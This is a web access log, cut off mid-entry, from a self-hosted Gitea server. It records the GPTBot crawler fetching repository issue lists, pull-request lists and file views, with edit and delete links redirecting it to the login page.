"/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:00:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:00:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:00:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:00:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:00:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:00:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_debug.spec?display=source" [Client 74.7.227.38] [Length 12385] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_debug.spec" -[17/Feb/2026:18:00:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_Final.spec?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:18:00:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.spec?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:18:00:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_org.py?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_org.py" -[17/Feb/2026:18:00:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_VeryGood.py?display=source" [Client 74.7.227.38] [Length 17406] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:18:00:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_debug.spec?display=rendered" [Client 74.7.227.38] [Length 10937] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_debug.spec" -[17/Feb/2026:18:00:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10138] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" -[17/Feb/2026:18:00:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:18:00:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:00:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:00:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:00:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:18:00:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json?display=source" [Client 74.7.227.38] [Length 11717] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json" -[17/Feb/2026:18:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11108] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:00:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" -[17/Feb/2026:18:00:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" -[17/Feb/2026:18:00:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" -[17/Feb/2026:18:00:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10096] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:00:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9936] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" -[17/Feb/2026:18:00:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 963] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:18:00:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 11774] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:18:00:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 9837] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:18:00:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 9834] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:18:00:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:18:00:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 10683] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:18:00:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log?display=source" [Client 74.7.227.38] [Length 41157] [Gzip 9.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:18:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log?display=source" [Client 74.7.227.38] [Length 21125] [Gzip 7.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:18:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:18:00:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 13201] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:18:00:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/honeywell-logo.svg?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:18:00:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/favicon.ico?display=rendered" [Client 74.7.227.38] [Length 10885] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/favicon.ico" -[17/Feb/2026:18:00:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 10681] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:18:00:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:18:00:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:18:00:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:18:00:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:18:00:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 277] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:18:00:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:18:00:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:18:00:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:18:00:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:18:00:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 9833] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:18:00:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/honeywell-logo.svg?display=source" [Client 74.7.227.38] [Length 13959] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:18:00:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:18:00:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:18:00:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:18:00:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:18:00:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 959] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:18:00:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:18:00:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:18:00:50 +0000] - 303 303 - GET 